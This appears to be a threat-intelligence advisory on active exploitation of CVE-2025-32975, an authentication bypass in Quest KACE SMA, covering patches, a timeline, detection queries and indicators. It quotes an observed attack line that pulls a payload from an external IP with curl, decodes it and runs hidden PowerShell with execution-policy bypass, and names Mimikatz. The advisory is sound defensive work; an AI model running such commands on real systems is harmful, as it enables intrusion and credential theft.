Executive Summary
Since March 2026, the critical CVE-2025-32975 vulnerability in Quest KACE Systems Management Appliance (SMA) has been linked to active attacks against unpatched, internet-exposed systems. The flaw carries a CVSS score of 10.0 and allows attackers to bypass authentication and impersonate legitimate users, creating a direct path to full administrative control.
That matters because KACE SMA is not a peripheral asset. It is an endpoint management platform with privileged visibility into enterprise systems. In activity observed by Arctic Wolf, attackers used the flaw to seize admin access, fetch payloads from external infrastructure, create new accounts, harvest credentials, and move deeper into victim environments. For defenders, this is a patch-now issue with clear lateral movement and command-and-control risk.
The flaw: Authentication bypass
CVE-2025-32975 is a critical-severity vulnerability (CVSS 10.0) in the SSO authentication handling mechanism of Quest KACE SMA. The issue allows attackers to impersonate legitimate users without valid credentials, which can lead to full administrative takeover.
How the exploit works
- Reach an exposed SMA instance over the network.
- Abuse the SSO authentication path to bypass normal login requirements.
- Impersonate a valid user or administrator and obtain privileged access.
- Execute follow-on actions such as remote commands, account creation, and payload retrieval.
- Establish persistence and expand access through credential theft or remote administration channels.
A simplified representation of the post-compromise activity observed by Arctic Wolf looks like this:
bashcurl hxxp://216.126.225.156/<payload> | base64 -d > payload.bin runkbot.exe <arguments> powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\temp\Enable-UpdateServices.ps1
The patch stream from Quest addressed this issue in 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4). The problem is no longer theoretical, however: exploitation is being observed on systems that remain unpatched and publicly reachable.
What is the CVE-2025-32975 exploitation timeline?
| Date | Event | Status |
|---|---|---|
| May 27, 2025 | Quest publishes advisory and fixed versions for CVE-2025-32975 and related flaws | ✅ Patch available |
| June 2025 | Public references for the vulnerability begin appearing in disclosure and tracking sources | 📢 Public disclosure |
| Week of March 9, 2026 | Arctic Wolf observes malicious activity consistent with exploitation in customer environments | ⚠️ Initial compromise |
| March 23, 2026 | Public reporting highlights ongoing attacks against unpatched internet-exposed SMA systems | 🔴 Active exploitation |
Why this matters: endpoint management as a high-value target
Key challenges
- Administrative blast radius: An attacker who wins admin access to an endpoint management appliance can affect a large number of systems from a single control plane.
- Exposure gap after patch release: The flaw was patched in 2025, but exposed systems remained reachable long enough for attackers to exploit them in 2026.
- Post-compromise escalation: Observed activity included new admin creation, Mimikatz use, and access to backup and directory infrastructure, which raises the risk of broader domain compromise and ransomware staging.
Critical risk: A compromise of KACE SMA is not just a web admin issue. It can become an account takeover, privileged management plane compromise, and enterprise-wide incident response event.
Defensive posture: immediate actions
🔴 Patch every exposed KACE SMA appliance
Update any affected instance to one of Quest’s fixed builds immediately:
13.0.385+13.1.81+13.2.183+14.0.341 Patch 5+14.1.101 Patch 4+
🔴 Remove public exposure
If remote access is required, place SMA behind a VPN, hardened reverse access path, or tightly restricted firewall policy. Public internet exposure materially increases risk here.
👥 Review privileged access and new accounts
- Audit recent administrative account creation on SMA.
- Review changes tied to
runkbot.exeactivity. - Reset credentials and rotate tokens if administrative access may have been abused.
🔍 Hunt for execution, persistence, and credential theft
Look for:
curldownloads from216.126.225.156- Base64-decoded payload staging
- PowerShell launched with hidden or bypass flags
- Mimikatz or lookalike binaries such as
asd.exe - RDP access to backup systems, domain controllers, or identity infrastructure
Splunk example:
splindex=windows OR index=edr ("runkbot.exe" OR "mimikatz" OR "asd.exe" OR "Enable-UpdateServices.ps1" OR "216.126.225.156") | stats count min(_time) as firstSeen max(_time) as lastSeen by host, user, process_name, parent_process_name, dest_ip, command_line
Microsoft Sentinel example:
kqlDeviceProcessEvents | where ProcessCommandLine has_any ("runkbot.exe", "mimikatz", "Enable-UpdateServices.ps1", "216.126.225.156") | project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName | order by Timestamp desc
🛡️ Segment and validate backup paths
Because observed intrusions reached backup infrastructure and domain controllers, validate admin paths into Veeam, Veritas, AD, and similar crown-jewel services. Restrict east-west access where possible.
Indicators and observed attacker behavior
Arctic Wolf reported activity consistent with the following pattern:
- remote command execution via KACE functionality
- payload retrieval from
216.126.225.156 - additional administrator creation via
runkbot.exe - PowerShell execution with hidden or bypassed settings
- Windows Registry modifications for persistence or configuration changes
- credential theft using Mimikatz
- reconnaissance with
net user,net group, andnet time - RDP access to backup infrastructure and domain controllers
This combination suggests operators were not stopping at initial access. They were using the appliance as a springboard for persistence, privilege expansion, and deeper operational control.
Bottom line
CVE-2025-32975 is a maximum-severity authentication bypass in a privileged enterprise platform, and attackers are already exploiting unpatched KACE SMA systems in the wild.
Key takeaways
✅ Patch status is not protection by itself — systems still exposed and unpatched remain viable targets long after disclosure.
✅ KACE SMA should be treated as high-impact infrastructure — compromise of an endpoint management appliance can cascade into credentials, backups, and domain administration.
✅ Exposure reduction matters — if an SMA instance is reachable from the public internet, the safest assumption is that it deserves immediate validation and remediation.
For your clients and users
Patch affected KACE SMA versions immediately, remove public exposure, and investigate for post-compromise activity if the appliance was internet-facing. Delays here increase the chance of administrative takeover and follow-on enterprise compromise.
Frequently Asked Questions
What is CVE-2025-32975?
CVE-2025-32975 is a critical authentication bypass vulnerability in Quest KACE SMA. It affects the product’s SSO authentication handling and can let attackers impersonate legitimate users without valid credentials.
Is CVE-2025-32975 being exploited?
Yes. Arctic Wolf reported malicious activity observed from the week of March 9, 2026 that is consistent with exploitation of CVE-2025-32975 on unpatched, internet-exposed KACE SMA systems.
Which versions are affected?
Affected versions include 13.0.x before 13.0.385, 13.1.x before 13.1.81, 13.2.x before 13.2.183, 14.0.x before 14.0.341 (Patch 5), and 14.1.x before 14.1.101 (Patch 4).
What should defenders do first?
Patch to a fixed version, remove direct internet exposure, review privileged account activity, and hunt for known post-compromise behaviors such as runkbot.exe, hidden PowerShell, Mimikatz, and suspicious outbound retrieval activity.
